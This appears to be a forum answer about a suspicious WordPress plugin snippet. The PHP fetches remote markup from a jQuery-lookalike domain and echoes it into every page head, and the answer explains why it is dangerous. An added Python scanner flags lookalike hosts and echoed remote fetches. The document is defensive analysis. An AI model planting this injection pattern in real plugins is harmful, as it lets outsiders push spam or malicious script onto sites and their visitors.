I found this in a plugin. What does it do? Is it dangerous?

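```php
add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head')) {
    function wp__head() {
        if (function_exists('curl_init')) {
            $ch = curl_init();
            // The request carries this site's host name as its Referer header
            curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
            $jquery = curl_exec($ch);
            echo "$jquery";
        }
    }
}
// Hooked into wp_head: runs while each front-end page's <head> is rendered
add_action('wp_head', 'wp__head');
```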


It loads a block of markup containing spam (I thought about posting a bit of the source but I don’t want to advertise the content in any way) from a domain that is a close misspelling of the domain (http://jquery.com/) used by jQuery, a reputable and popular JavaScript library and one that WordPress includes in the Core. I think the idea is to appear to be loading that library, when in fact it is loading something very different.

And it is in other ways attempting to appear to be loading jQuery. Notice the variable name $jquery.

It may attempt to load malicious scripts as well. I didn’t check.
I would definitely call it dangerous, especially since the content on that page can change anytime the domain controllers feel like it.

At best it is going to damage your site as search engines look down on sites that spread spam.

Don’t use it. It does nothing beneficial for you or for anyone else on the web other than the people who run the site. If you found this on a reputable site, report it to them.
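A way to check other plugin files for the two traits described above, a host that is a near-misspelling of a trusted script domain and a remote fetch that is echoed into the page. This is an added example, not code from the original post or from any plugin; `TRUSTED_DOMAINS`, the function names, and the `jqeury.example` host in the sample are assumptions made up for illustration.

```python
import re
from urllib.parse import urlparse
# Assumption: domains this site legitimately loads scripts from; adjust per site.
TRUSTED_DOMAINS = {"jquery.com", "googleapis.com", "wordpress.org"}
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)
FETCH_RE = re.compile(r"(\$\w+)\s*=\s*(?:curl_exec|file_get_contents)\s*\(")
# Constructed sample (not the plugin's real code); jqeury.example is a made-up host.
SAMPLE = r'''
wp_enqueue_script('jq', 'https://code.jquery.com/jquery-3.7.1.min.js');
function wp__head() {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'http://jqeury.example/');
    $jquery = curl_exec($ch);
    echo "$jquery";
}
add_action('wp_head', 'wp__head');
'''

def edit_distance(a, b):
    prev = list(range(len(b) + 1))  # Levenshtein distance, one row at a time
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable(host):
    # Naive last-two-labels rule; a public-suffix list is needed for e.g. co.uk.
    return ".".join(host.lower().split(".")[-2:])

def lookalike_hosts(php_source, max_distance=2):
    """(host, trusted domain it resembles, distance) for untrusted near-miss hosts."""
    findings = set()
    for url in URL_RE.findall(php_source):
        host = urlparse(url).hostname or ""
        domain = registrable(host)
        if not host or domain in TRUSTED_DOMAINS:
            continue
        for trusted in TRUSTED_DOMAINS:
            d = edit_distance(domain.split(".")[0], trusted.split(".")[0])
            if d <= max_distance:
                findings.add((host, trusted, d))
    return sorted(findings)

def echoed_remote_fetch(php_source):
    """PHP variables that receive a remote fetch and are then echoed or printed."""
    return [v for v in FETCH_RE.findall(php_source)
            if re.search(r"\b(?:echo|print)\b[^;]*" + re.escape(v) + r"\b", php_source)]
```

A hit from either function is a reason to read the file by hand, not proof of compromise; obfuscated code that builds its URL at run time will not match.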
